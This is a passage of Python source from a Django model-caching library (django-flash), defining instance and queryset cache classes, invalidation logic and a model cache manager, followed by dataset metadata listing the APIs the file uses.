self.key_fields:\n try:\n field = self.model._meta.get_field(field_name)\n params.append(getattr(instance, field.attname))\n if (field.attname in instance_state_diff and\n 'pre' in instance_state_diff[field.attname]):\n params_pre.append(instance_state_diff[\n field.attname]['pre'])\n else:\n params_pre.append(getattr(instance, field.attname))\n except:\n if hasattr(self.model, field_name):\n field_obj = getattr(self.model, field_name)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field_obj, GenericForeignKey):\n ctype_field_name = field_obj.ct_field\n ctype_field_attname = self.model._meta.get_field(\n ctype_field_name).attname\n object_id_attname = field_obj.fk_field\n params.append((getattr(instance, ctype_field_attname),\n (getattr(instance, object_id_attname))))\n if (object_id_attname in instance_state_diff and\n 'pre' in instance_state_diff[object_id_attname]):\n params_pre.append((\n getattr(instance, ctype_field_attname),\n instance_state_diff[object_id_attname]['pre']))\n else:\n params_pre.append((\n getattr(instance, ctype_field_attname),\n getattr(instance, object_id_attname)))\n continue\n raise\n params_list.append(params)\n if params_pre != params:\n params_list.append(params_pre)\n return params_list\n\n\nclass InstanceCache(six.with_metaclass(InstanceCacheMeta,\n BaseModelQueryCache, SameModelInvalidationCache)):\n \"\"\" This class is used when an instance of a model is cached on\n some fields of same model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) select_related: list of related instances (attribute)\n 4) get_instance : custom method to get instance (method)\n \"\"\"\n cache_type = 'InstanceCache'\n\n @abstractproperty\n def key_fields(self):\n pass\n\n @classmethod\n def register_related_caches(cls):\n cls.related_caches = {}\n if not hasattr(cls, 'select_related'):\n return\n for relation in cls.select_related:\n class_name = '%s__%s' % (cls.__name__, relation)\n # Create new RelatedInstanceCache class dynamically\n related_cache_class = type(class_name, (RelatedInstanceCache,), {\n 'model': cls.model,\n 'key_fields': cls.key_fields,\n 'relation': relation,\n 'version': cls.version,\n 'timeout': cls.timeout,\n })\n # And store it's instance in related_caches\n cls.related_caches[relation] = related_cache_class\n\n @instancemethod\n def get_cache_model(self):\n return self.model\n\n @instancemethod\n def get_invalidation_models(self):\n return self._get_invalidation_models()\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return self._get_keys_to_be_invalidated(instance, signal, using)\n\n def get_extra_keys(self, *args, **kwargs):\n \"\"\" Returns the keys from assosiated related cache classes\n for given params.\n \"\"\"\n if not hasattr(self, 'select_related'):\n return\n keys = []\n for relation in self.select_related:\n related_cache = self.related_caches[relation]\n key = related_cache.get_key(*args, **kwargs)\n keys.append(key)\n return keys\n\n def get_instance(self, **filter_dict):\n \"\"\" Returns the instance of model.\n Can be overriden in derived classes.\n \"\"\"\n try:\n return self.get_queryset().get(**filter_dict)\n except self.model.DoesNotExist:\n if self.is_simple:\n # Returning the None so that it gets cached.\n return None\n # If there is some problem with storing\n # DoesNotExist as None in cache, then comment upper return\n # and uncomment below return\n # return DontCache(None)\n raise\n except:\n raise\n\n def remove_fk_instances(self, instance):\n \"\"\" Removes all related instances through fields on instance\n before the instance gets saved in cache\n \"\"\"\n if instance is None:\n return\n\n for prop in flash_properties[instance.__class__]:\n attr = '_%s_cache' % prop\n if hasattr(instance, attr):\n delattr(instance, attr)\n\n for field in instance._meta.fields:\n if field.rel:\n attr = '_%s_cache' % field.name\n if hasattr(instance, attr):\n delattr(instance, attr)\n\n def get_value_for_params(self, *args, **kwargs):\n params = self.get_field_dict(*args, **kwargs)\n instance = self.get_instance(**params)\n return instance\n\n def pre_set_process_value(self, instance, *args, **kwargs):\n instance_clone = copy.copy(instance)\n self.remove_fk_instances(instance_clone)\n return instance_clone\n\n def get_extra_key_value_dict(self, instance, *args, **kwargs):\n \"\"\" Returns the key value dict from relations given in select_related\n for given instance. Used when instance is saved in cache.\n \"\"\"\n if instance is None:\n return\n if self.related_caches:\n key_value_dict = {}\n for relation in self.related_caches:\n related_value = instance\n for field_name in relation.split('__'):\n related_value = getattr(related_value, field_name)\n related_cache = self.related_caches[relation]\n related_key = related_cache.get_key(*args, **kwargs)\n key_value_dict[related_key] = related_value\n return key_value_dict\n\n def post_process_value(self, instance, key_value_dict, *args, **kwargs):\n \"\"\" Patches all related instances got from cache in key_value_dict\n to instance.\n \"\"\"\n if instance is None:\n if self.is_simple:\n cache_model = self.get_cache_model()\n raise cache_model.DoesNotExist(\n \"%s matching query does not exist.\" %\n cache_model._meta.object_name)\n return instance\n if not hasattr(self, 'select_related'):\n return instance\n if key_value_dict is None:\n return instance\n keys = []\n relation_keys = {}\n for relation in self.select_related:\n related_cache = self.related_caches[relation]\n key = related_cache.get_key(*args, **kwargs)\n keys.append(key)\n relation_keys[relation] = key\n\n for relation in self.select_related:\n key = relation_keys[relation]\n if not key in key_value_dict:\n continue\n value = key_value_dict[key]\n last_field_name = None\n related_value = instance\n for field_name in (relation.split('__') + [None]):\n if field_name is None:\n setattr(related_value, last_field_name, value)\n else:\n if last_field_name:\n if not hasattr(related_value, last_field_name):\n break\n related_value = getattr(related_value, last_field_name)\n last_field_name = field_name\n return instance\n\n\nclass RelatedInstanceCacheMeta(InstanceCacheMeta):\n \"\"\" Meta class for RelatedInstanceCache\n \"\"\"\n def __new__(cls, *args, **kwargs):\n ncls = super(RelatedInstanceCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n # store all models encountered in reaching last field of relation\n # in rel_models of new class.\n model = ncls.model\n rel_models = {}\n rel_models_inv = {}\n rel_model = model\n relation_splits = ncls.relation.split('__')\n relation_str = ''\n for field_name in relation_splits:\n rel_model = rel_model._meta.get_field(field_name).rel.to\n if relation_str:\n relation_str += '__%s' % field_name\n else:\n relation_str += field_name\n rel_models[rel_model] = relation_str\n rel_models_inv[relation_str] = rel_model\n ncls.rel_models = rel_models\n ncls.rel_models_inv = rel_models_inv\n return ncls\n\n\nclass RelatedModelInvalidationCache(object):\n \"\"\" Mixin class used in RelatedInstanceCache, RelatedQuerysetCache\n \"\"\"\n def _get_invalidation_models(self):\n return [self.model] + self.rel_models.keys()\n\n def _get_keys_to_be_invalidated(self, instance, signal, using):\n keys = []\n for params in self.get_invalidation_params_list(instance, signal):\n keys.append(self.get_key(*params, **{USING_KWARG: using}))\n return keys\n\n def get_invalidation_params_list(self, instance, signal):\n \"\"\" It's called when an instance gets saved and caches\n have to be invalidated.\n\n Returns the list of params on which keys to be invalidated.\n \"\"\"\n key_params_list = []\n\n key_fields_attname = []\n for field_name in self.key_fields:\n field = self.model._meta.get_field(field_name)\n key_fields_attname.append(field.attname)\n\n if isinstance(instance, self.model):\n # get all values in instance assosiated with\n # key_fields and put in params list.\n field_values = []\n field_values_pre = []\n instance_state_diff = instance.get_state_diff()\n for field_attname in key_fields_attname:\n value = getattr(instance, field_attname)\n field_values.append(value)\n if field_attname in instance_state_diff and (\n 'pre' in instance_state_diff[field_attname]):\n field_values_pre.append(instance_state_diff[field_attname]['pre'])\n else:\n field_values_pre.append(value)\n key_params_list.append(tuple(field_values))\n if field_values_pre != field_values:\n key_params_list.append(tuple(field_values_pre))\n\n for rel_model in self.rel_models:\n if isinstance(instance, rel_model):\n filter_dict = {\n self.rel_models[rel_model]: instance,\n }\n # get list of all values using database\n attname_values_list = self.model.objects.filter(\n **filter_dict).values(*key_fields_attname)\n for value in attname_values_list:\n key_params_list.append(tuple(\n [value[attname] for attname in key_fields_attname]))\n if isinstance(instance, tuple):\n # case when instances of many_to_many through model are added\n # or removed.\n instance, _, model, pk_set = instance\n if len(self.key_fields) == 1:\n if (self.key_fields[0] ==\n instance.__class__._meta.object_name.lower()):\n key_params_list.append((instance.id,))\n elif (self.key_fields[0] ==\n model._meta.object_name.lower()):\n for pk in pk_set:\n key_params_list.append((pk,))\n else:\n filter_dict = {\n instance.__class__._meta.object_name.lower():\n instance.pk,\n '%s__in' % model._meta.object_name.lower():\n pk_set,\n }\n # get list of all values using database\n attname_values_list = self.model.objects.filter(\n **filter_dict).values(*key_fields_attname)\n for value in attname_values_list:\n key_params_list.append(tuple(\n [value[attname] for attname in key_fields_attname]))\n return key_params_list\n\n\n\nclass RelatedInstanceCache(six.with_metaclass(RelatedInstanceCacheMeta,\n InstanceCache, RelatedModelInvalidationCache)):\n \"\"\" This class is used when an instance through a related field is cached on\n some fields of a model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) relation: related field_name (* attribute)\n 4) get_instance : custom method to get instance (method)\n \"\"\"\n generic_fields_support = False\n\n cache_type = 'RelatedInstanceCache'\n\n @abstractproperty\n def relation(self):\n pass\n\n @instancemethod\n def get_cache_model(self):\n return self.rel_models_inv[self.relation]\n\n @instancemethod\n def get_invalidation_models(self):\n return RelatedModelInvalidationCache._get_invalidation_models(self)\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return RelatedModelInvalidationCache._get_keys_to_be_invalidated(\n self, instance, signal, using)\n\n def get_instance(self, **filter_dict):\n dep_instance = self.get_queryset().select_related(\n self.relation).get(**filter_dict)\n instance = dep_instance\n for rel_attr in self.relation.split('__'):\n instance = getattr(instance, rel_attr)\n return instance\n\n\nclass QuerysetCacheMeta(BaseModelQueryCacheMeta):\n \"\"\" Meta class of QuerysetCache class\n \"\"\"\n queryset_cache_classes = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n ncls = super(QuerysetCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n cls.queryset_cache_classes[model].append(ncls)\n if (six.get_unbound_function(ncls.get_result) ==\n six.get_unbound_function(QuerysetCache.get_result)):\n ncls.is_simple = True\n else:\n ncls.is_simple = False\n return ncls\n\n\nclass QuerysetCache(six.with_metaclass(QuerysetCacheMeta,\n BaseModelQueryCache, SameModelInvalidationCache)):\n \"\"\" This class is used when result of filter queryset or its\n descendent queryset of a model is cached on some fields of same model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 4) get_result : custom method to get result (method)\n \"\"\"\n cache_type = 'QuerysetCache'\n\n caching_model_instances = True\n\n @abstractproperty\n def key_fields(self):\n pass\n\n @instancemethod\n def get_cache_model(self):\n if self.caching_model_instances:\n return self.model\n return None\n\n @instancemethod\n def get_invalidation_models(self):\n return self._get_invalidation_models()\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return self._get_keys_to_be_invalidated(instance, signal, using)\n\n def get_result(self, **params):\n \"\"\" By default returns the filter queryset's result\n \"\"\"\n return list(self.get_queryset().filter(**params))\n\n def get_value_for_params(self, *args, **kwargs):\n params = self.get_field_dict(*args, **kwargs)\n result = self.get_result(**params)\n return result\n\n\nclass RelatedQuerysetCacheMeta(QuerysetCacheMeta):\n \"\"\" Meta class of RelatedQuerysetCache class\n \"\"\"\n def __new__(cls, *args, **kwargs):\n ncls = super(RelatedQuerysetCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n # store all models encountered in reaching last field of relation\n # in rel_models of new class.\n model = ncls.model\n rel_models = {}\n rel_models_inv = {}\n rel_model = model\n relation_splits = ncls.relation.split('__')\n relation_str = ''\n for field_name in relation_splits:\n rel_model = rel_model._meta.get_field(field_name).rel.to\n if relation_str:\n relation_str += '__%s' % field_name\n else:\n relation_str += field_name\n rel_models[rel_model] = relation_str\n rel_models_inv[relation_str] = rel_model\n ncls.rel_models = rel_models\n ncls.rel_models_inv = rel_models_inv\n return ncls\n\n\nclass RelatedQuerysetCache(six.with_metaclass(RelatedQuerysetCacheMeta,\n QuerysetCache, RelatedModelInvalidationCache)):\n \"\"\" This class is used when result of filter queryset or its descendent\n queryet through a related field is cached on some fields of a model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) relation: related field_name (* attribute)\n 4) get_result : custom method to get result (method)\n \"\"\"\n generic_fields_support = False\n\n cache_type = 'RelatedQuerysetCache'\n\n @instancemethod\n def get_cache_model(self):\n return self.rel_models_inv[self.relation]\n\n @abstractproperty\n def relation(self):\n pass\n\n @instancemethod\n def get_invalidation_models(self):\n return RelatedModelInvalidationCache._get_invalidation_models(self)\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return RelatedModelInvalidationCache._get_keys_to_be_invalidated(\n self, instance, signal, using)\n\n def get_result(self, **params):\n qset = self.get_queryset().filter(**params).select_related(\n self.relation)\n return list([getattr(i, self.relation) for i in qset])\n\n\nclass QuerysetExistsCache(QuerysetCache):\n \"\"\" QuerysetCache derived class to cache existance of instances\n \"\"\"\n caching_model_instances = False\n\n @abstractproperty\n def key_fields(self):\n pass\n\n def get_result(self, **params):\n return self.get_queryset().filter(**params).exists()\n\n def post_process_value(self, value, *args, **kwargs):\n \"\"\" It's defined cause cache retuned values are integers (0 or 1)\n It converts them to boolean\n \"\"\"\n if value is None:\n return value\n return bool(value)\n\n\nclass CacheManager(six.with_metaclass(ABCMeta, object)):\n \"\"\" Base class for model or non model based cache managers\n \"\"\"\n\n\nclass CachedReverseSingleRelatedObjectDescriptor(\n ReverseSingleRelatedObjectDescriptor):\n def __init__(self, field_with_rel, cache_class):\n super(CachedReverseSingleRelatedObjectDescriptor, self).__init__(\n field_with_rel)\n self.cache_class = cache_class\n\n def __get__(self, instance, instance_type=None):\n if instance is None:\n return self\n try:\n return getattr(instance, self.cache_name)\n except AttributeError:\n val = getattr(instance, self.field.attname)\n if val is None:\n # If NULL is an allowed value, return it.\n if self.field.null:\n return None\n raise self.field.rel.to.DoesNotExist\n rel_obj = self.cache_class.get(val)\n setattr(instance, self.cache_name, rel_obj)\n return rel_obj\n\ndef patch_related_object_descriptor(model, key, cache_class):\n orig_key = '_%s_using_db' % key\n setattr(model, orig_key, getattr(model, key))\n setattr(model, key, CachedReverseSingleRelatedObjectDescriptor(\n model._meta.get_field(key), cache_class))\n\n\nclass ModelCacheManagerMeta(ABCMeta):\n \"\"\" Meta class for ModelCacheManager\n \"\"\"\n model_cache_managers = {}\n model_cached_foreignkeys = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n own_attrs = args[2]\n model = own_attrs['model']\n\n if model in cls.model_cache_managers:\n # Commenting assertion due to some module reloading bug\n # assert False, \"More than one ModelCacheManager can't be defined for %s\" % (\n # model,)\n return cls.model_cache_managers[model]\n\n if hasattr(model, 'CacheMeta'):\n cachemeta_attrs = {}\n for key, value in model.CacheMeta.__dict__.items():\n if not key.startswith('_'):\n cachemeta_attrs[key] = value\n\n mergable_keys = [\n 'get_key_fields_list',\n 'filter_key_fields_list',\n 'cached_foreignkeys'\n ]\n\n for key, value in cachemeta_attrs.items():\n if key in mergable_keys:\n if (isinstance(value, (tuple, list)) and\n key in own_attrs and\n [i for i in value if i in own_attrs[key]]):\n assert False, \"`%s` in CacheMeta and %s should not have common values\" % (\n key, args[0])\n own_attrs[key] = cachemeta_attrs[key] + own_attrs.get(key, [])\n elif key in own_attrs:\n assert False, \"`%s` can't be defined in both CacheMeta and %s\" % (\n key, args[0])\n else:\n own_attrs[key] = cachemeta_attrs[key]\n\n ncls = super(ModelCacheManagerMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n ncls_instance = ncls()\n\n # register instance of new ModelCacheManager class\n cls.model_cache_managers[model] = ncls_instance\n\n # register all simple_instance_cache_classes\n # and simple_queryset_cache_classes so that `get` and `filter` methods\n # of model cache manager can decide which cache class to be used\n ncls.instance_cache_classes = []\n ncls.simple_instance_cache_classes = {}\n\n if hasattr(ncls_instance, 'get_key_fields_list'):\n # create instance_cache_classes for assosiated model\n ncls_instance.register_instance_classes()\n\n for instance_cache_class in InstanceCacheMeta.instance_cache_classes[\n model]:\n ncls.instance_cache_classes.append(instance_cache_class)\n if instance_cache_class.is_simple:\n key_fields_sorted = tuple(\n sorted(instance_cache_class.key_fields))\n ncls.simple_instance_cache_classes[\n key_fields_sorted] = instance_cache_class\n\n ncls.queryset_cache_classes = []\n ncls.simple_queryset_cache_classes = {}\n\n if hasattr(ncls_instance, 'filter_key_fields_list'):\n # create queryset_cache_classes for assosiated model\n ncls_instance.register_queryset_classes()\n\n for queryset_cache_class in QuerysetCacheMeta.queryset_cache_classes[\n model]:\n ncls.queryset_cache_classes.append(queryset_cache_class)\n if queryset_cache_class.is_simple:\n key_fields_sorted = tuple(\n sorted(queryset_cache_class.key_fields))\n ncls.simple_queryset_cache_classes[\n key_fields_sorted] = queryset_cache_class\n\n if hasattr(ncls_instance, 'cached_foreignkeys'):\n cls.model_cached_foreignkeys[model] = ncls_instance.cached_foreignkeys\n\n return ncls\n\n @classmethod\n def create_cache_managers_from_models(cls):\n for model in get_models():\n if (not model in cls.model_cache_managers and\n hasattr(model, 'CacheMeta')):\n cache_manager_name = 'Auto%sCacheManager' % model.__name__\n type(cache_manager_name, (ModelCacheManager,), {\n 'model': model})\n\n\n @classmethod\n def patch_cached_foreignkeys(cls):\n for model, cached_foreignkeys in cls.model_cached_foreignkeys.items():\n for key in cached_foreignkeys:\n try:\n rel_model = model._meta.get_field(key).rel.to\n rel_model_pk_name = rel_model._meta.pk.name\n cache_class = rel_model.cache.get_cache_class_for(\n rel_model_pk_name)\n patch_related_object_descriptor(\n model, key, cache_class)\n except CacheNotRegistered:\n assert False, (\"Cached foreignkey can't be made on field \"+\n \"`%s` of %s. Because %s is not cached on \"+\n \"it's primary key\") % (\n key, model, model._meta.get_field(key).rel.to)\n\n\n @classmethod\n def get_model_cache_manager(cls, model):\n \"\"\" Returns the cache manager assosiated with given model\n \"\"\"\n if model not in cls.model_cache_managers:\n # If some model cache manager class is not defined for given\n # model then create it dynamically\n class_name = 'Auto%sCacheManager' % model.__name__\n type(class_name, (ModelCacheManager,), {\n 'model': model})\n return cls.model_cache_managers[model]\n\n\nclass CacheNotRegistered(Exception):\n def __init__(self, model, key_fields):\n msg = ('No cache registered for model `%s` on fields '+\n '`%s`') % (str(model), str(tuple(key_fields)))\n super(CacheNotRegistered, self).__init__(msg)\n\n\nclass ModelCacheManager(six.with_metaclass(ModelCacheManagerMeta,\n CacheManager)):\n version = 0\n timeout = flash_settings.DEFAULT_TIMEOUT\n\n @abstractproperty\n def model(self):\n pass\n\n def register_instance_classes(self):\n \"\"\" Create InstanceCache classes dynamically\n for each pair in get_key_fields_list.\n \"\"\"\n for key_fields in self.get_key_fields_list:\n class_name = '%sCacheOn' % self.model.__name__\n for field_name in key_fields:\n class_name += field_name.title()\n type(class_name, (InstanceCache,), {\n 'model': self.model,\n 'key_fields': key_fields,\n 'version': self.version,\n 'timeout': self.timeout,\n })\n\n def register_queryset_classes(self):\n \"\"\" Create QuerysetCache classes dynamically\n for each pair in filter_key_fields_list.\n \"\"\"\n for key_fields in self.filter_key_fields_list:\n class_name = '%sCacheOn' % self.model.__name__\n for field_name in key_fields:\n class_name += field_name.title()\n type(class_name, (QuerysetCache,), {\n 'model': self.model,\n 'key_fields': key_fields,\n 'version': self.version,\n 'timeout': self.timeout,\n })\n\n def get_key_fields(self, args_or_kwargs):\n key_fields = []\n\n is_dict = False\n if isinstance(args_or_kwargs, dict):\n args_set = set(args_or_kwargs.keys())\n is_dict = True\n kwargs = args_or_kwargs\n else:\n args_set = set(args_or_kwargs)\n\n if 'pk' in args_set:\n args_set.remove('pk')\n if is_dict:\n value = kwargs.pop('pk')\n pk_field_name = self.model._meta.pk.name\n args_set.add(pk_field_name)\n if is_dict:\n kwargs[pk_field_name] = value\n\n for key in args_set:\n if key == USING_KWARG:\n continue\n try:\n field = self.model._meta.get_field(key)\n key_fields.append(field.name)\n except:\n if hasattr(self.model, key):\n field = getattr(self.model, key)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field, GenericForeignKey):\n key_fields.append(key)\n continue\n if key.endswith('_id'):\n key_fields.append(key[:-3])\n continue\n raise\n return tuple(sorted(key_fields))\n\n def get(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's get result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class.get(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def get_query(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's object for given params.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def get_async(self, **kwargs):\n \"\"\" await counterpart of get method\n \"\"\"\n return self.get_query(**kwargs).resolve_async()\n\n def get_async_or_none(self, **kwargs):\n from .loader import object_or_none\n return object_or_none(self.get_async(**kwargs))\n\n def get_async_or_404(self, **kwargs):\n from .loader import object_or_404\n return object_or_404(self.get_async(**kwargs))\n\n def get_cache_class_for(self, *args):\n \"\"\" Find the instance_cache_class for given params\n and return it's cache class.\n \"\"\"\n key_fields = self.get_key_fields(args)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class\n raise CacheNotRegistered(self.model, args)\n\n def get_key(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's get_key result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class.get_key(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter(self, **kwargs):\n \"\"\" Find the queryset_cache_class for given params\n and return it's get result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class.get(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter_query(self, **kwargs):\n \"\"\" Find the queryset_cache_class for given params\n and return it's object for given params.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter_async(self, **kwargs):\n \"\"\" await counterpart of filter method.\n \"\"\"\n return self.filter_query(**kwargs).resolve_async()\n\n def filter_cache_class_for(self, *args):\n \"\"\" Find the queryset_cache_class for given params\n and return it's cache class.\n \"\"\"\n key_fields = self.get_key_fields(args)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class\n raise CacheNotRegistered(self.model, args)\n\n def get_or_404(self, **kwargs):\n \"\"\" If the get result is not found raises 404.\n \"\"\"\n try:\n return self.get(**kwargs)\n except self.model.DoesNotExist:\n raise Http404('No %s matches the given query.' %\n self.model._meta.object_name)\n\n def get_or_none(self, **kwargs):\n \"\"\" If the get result is not found returns None.\n \"\"\"\n try:\n return self.get(**kwargs)\n except self.model.DoesNotExist:\n return None\n", "repo_name": "HackerEarth/django-flash", "sub_path": "flash/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 58925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.core.cache.caches", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.get_models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.apps.apps.get_models", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.apps.apps", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.generic.GenericForeignKey", "line_number": 41, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 44, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 45, "usage_type": "name"}, {"api_name": "django.core.cache.get_cache", "line_number": 53, "usage_type": "call"}, {"api_name": "flash.settings.CACHE_NAME", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 78, "usage_type": "call"}, {"api_name": "six.python_2_unicode_compatible", "line_number": 87, "usage_type": "attribute"}, {"api_name": "six.with_metaclass", "line_number": 128, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 128, "usage_type": "argument"}, {"api_name": "flash.settings.DEFAULT_TIMEOUT", "line_number": 144, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 144, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 162, "usage_type": "name"}, {"api_name": "flash.models.CacheDynamicVersion.objects.get_version_of", "line_number": 171, "usage_type": "call"}, {"api_name": "flash.models.CacheDynamicVersion.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "flash.models.CacheDynamicVersion", "line_number": 171, "usage_type": "name"}, {"api_name": "flash.settings.WRITE_LOCK_TIMEOUT", "line_number": 194, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 194, "usage_type": "name"}, {"api_name": "flash.option.Some", "line_number": 237, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 239, "usage_type": "name"}, {"api_name": "time.time", "line_number": 269, "usage_type": "call"}, {"api_name": "time.time", "line_number": 323, "usage_type": "call"}, {"api_name": "time.time", "line_number": 365, "usage_type": "call"}, {"api_name": "distutils.version.StrictVersion", "line_number": 371, "usage_type": "call"}, {"api_name": "django.get_version", "line_number": 371, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_unless_managed", "line_number": 372, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 372, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 402, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 402, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 415, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 426, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 426, "usage_type": "name"}, {"api_name": "thread_context.dataloader_context.DataLoadersFactory.get_loader_for", "line_number": 437, "usage_type": "call"}, {"api_name": "thread_context.dataloader_context.DataLoadersFactory", "line_number": 437, "usage_type": "name"}, {"api_name": "loader.FlashCacheLoader", "line_number": 437, "usage_type": "name"}, {"api_name": "loader.load", "line_number": 438, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 501, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 507, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 508, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 533, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 546, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 553, "usage_type": "name"}, {"api_name": "flash.settings.db_discoverer_func", "line_number": 558, "usage_type": "call"}, {"api_name": "flash.settings", "line_number": 558, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 573, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 577, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 621, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 622, "usage_type": "argument"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects_cache.get_for_model", "line_number": 628, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects_cache", "line_number": 628, "usage_type": "attribute"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 628, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 640, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 640, "usage_type": "name"}, {"api_name": "flash.utils.memcache_key_escape", "line_number": 656, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 663, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 673, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 674, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 756, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 757, "usage_type": "argument"}, {"api_name": "six.with_metaclass", "line_number": 781, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 795, "usage_type": "name"}, {"api_name": "flash.utils.flash_properties", "line_number": 866, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 883, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1057, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1073, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 1101, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 1109, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 1110, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1117, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1132, "usage_type": "name"}, {"api_name": "six.with_metaclass", "line_number": 1188, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1208, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 1231, "usage_type": "name"}, {"api_name": "six.with_metaclass", "line_number": 1247, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 1247, "usage_type": "argument"}, {"api_name": "django.db.models.fields.related_descriptors.ForwardManyToOneDescriptor", "line_number": 1253, "usage_type": "name"}, {"api_name": "abc.ABCMeta", "line_number": 1282, "usage_type": "name"}, {"api_name": 